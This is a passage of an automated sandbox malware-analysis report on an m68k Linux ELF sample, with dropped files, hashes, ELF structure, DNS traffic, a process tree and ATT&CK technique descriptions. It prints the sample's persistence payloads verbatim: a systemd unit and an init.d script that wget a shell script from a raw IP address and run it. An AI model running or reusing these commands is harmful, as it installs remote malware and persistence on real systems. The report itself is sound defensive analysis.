Preview:	[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/m68k.nn.elf.ExecStartPost=/usr/bin/wget http://94.156.227.229/lol.sh -O /tmp/lol.sh.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/tmp/qemu-open.QnTq7b (deleted)

Download File

Process:	/tmp/m68k.nn.elf
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	17
Entropy (8bit):	3.6168746059562227
Encrypted:	false
SSDEEP:	3:TgSC/ANln:TglOn
MD5:	CF5BFD6A623ECC046218AA0EBA4D8FE7
SHA1:	E3F0D3236A8D19B35DB7D7F81FECBA0A5D613E88
SHA-256:	C3A372684D6533CABFEC9940A5B0C21F5CD8C12CE9FECD07DE6D5C5E31C00560
SHA-512:	F2C31F4B0FA981357F508A6C3B32A3DAEDC609FDE9EC704411D022BE11643B7F6EC039421ACB9EDE5334ACA2A7F1068D5B55106F4BF46327A229E2A04D31547B
Malicious:	false
Preview:	/tmp/m68k.nn.elf.

Static File Info

General

File type:	ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.35670920543686
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	m68k.nn.elf
File size:	94'948 bytes
MD5:	8845ad8ddea06d04b98a1c8dc9c97c56
SHA1:	fddc02400f6189995b491b6f74f0fe0a4e9dd05b
SHA256:	233e8137b8c1b925ca40c6851777a8ddd4859a2ddbdf282d670b0a918be000e0
SHA512:	7b0992ccf98f4767a2b183cb23e2b381fb9632af0e7a8a3e3bd4d748b3e3f315a921f358166879e6c1ef2d9a73a6070bb7eb43104c0b12df5c7186ec1c32b2f8
SSDEEP:	1536:cT9Xr6oLlGN5CxwDH6rEr10qR3i8eEs1P6BxPY8oMGfjDFfb16yOp:6tdlGN96rm10qR35s2P/obRLA
TLSH:	4D935CC6FC01CE7EF81ED7BF50230519B621A3615A431F36A697BD97EDB61980823E81
File Content Preview:	.ELF.......................D...4..qT.....4. ...(......................lF..lF...... .......lL...L...L......&....... .dt.Q............................NV..a....da...H.N^NuNV..J9....f>"y...d QJ.g.X.#....dN."y...d QJ.f.A.....J.g.Hy..lHN.X.........N^NuNV..N^NuN

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	MC68000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x80000144
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	94548
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x80000094	0x94	0x14	0x0	0x6	AX	2
.text	PROGBITS	0x800000a8	0xa8	0x1482a	0x0	0x6	AX	4
.fini	PROGBITS	0x800148d2	0x148d2	0xe	0x0	0x6	AX	2
.rodata	PROGBITS	0x800148e0	0x148e0	0x2366	0x0	0x2	A	2
.ctors	PROGBITS	0x80018c4c	0x16c4c	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x80018c54	0x16c54	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x80018c60	0x16c60	0x4b4	0x0	0x3	WA	4
.bss	NOBITS	0x80019114	0x17114	0x2210	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x17114	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x80000000	0x80000000	0x16c46	0x16c46	6.3721	0x5	R E	0x2000	.init .text .fini .rodata
LOAD	0x16c4c	0x80018c4c	0x80018c4c	0x4c8	0x26d8	4.7570	0x6	RW	0x2000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 09:14:08.002656937 CET	33188	53	192.168.2.13	8.8.8.8
Dec 27, 2024 09:14:08.002656937 CET	50047	53	192.168.2.13	8.8.8.8
Dec 27, 2024 09:14:08.125109911 CET	53	50047	8.8.8.8	192.168.2.13
Dec 27, 2024 09:14:08.136588097 CET	53	33188	8.8.8.8	192.168.2.13

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 09:14:08.002656937 CET	192.168.2.13	8.8.8.8	0x698f	Standard query (0)	daisy.ubuntu.com	A (IP address)	IN (0x0001)	false
Dec 27, 2024 09:14:08.002656937 CET	192.168.2.13	8.8.8.8	0x390	Standard query (0)	daisy.ubuntu.com	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 09:14:08.136588097 CET	8.8.8.8	192.168.2.13	0x698f	No error (0)	daisy.ubuntu.com		162.213.35.24	A (IP address)	IN (0x0001)	false
Dec 27, 2024 09:14:08.136588097 CET	8.8.8.8	192.168.2.13	0x698f	No error (0)	daisy.ubuntu.com		162.213.35.25	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: m68k.nn.elf PID: 5449, Parent PID: 5373

General

Start time (UTC):	08:14:04
Start date (UTC):	27/12/2024
Path:	/tmp/m68k.nn.elf
Arguments:	/tmp/m68k.nn.elf
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Start time (UTC):	08:14:04
Start date (UTC):	27/12/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Start time (UTC):	08:14:04
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "systemctl enable custom.service >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable custom.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/system
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/system /etc/rcS.d/S99system
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/m68k.nn.elf
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/usr/bin/mkdir
Arguments:	mkdir -p /etc/rc.d
File size:	88408 bytes
MD5 hash:	088c9d1df5a28ed16c726eca15964cb7

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	08:14:04
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:14:04
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:14:05
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report m68k.nn.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/boot/bootcmd

/etc/init.d/m68k.nn.elf

/etc/init.d/system

/etc/inittab

/etc/motd

/etc/profile

/etc/rc.local

/etc/systemd/system/custom.service

/memfd:snapd-env-generator (deleted)

/tmp/qemu-open.QnTq7b (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: m68k.nn.elf PID: 5449, Parent PID: 5373

General

Chronological Activities

Analysis Process: m68k.nn.elf PID: 5472, Parent PID: 5449

General

Chronological Activities

Analysis Process: sh PID: 5472, Parent PID: 5449

General

Linux Analysis Report
m68k.nn.elf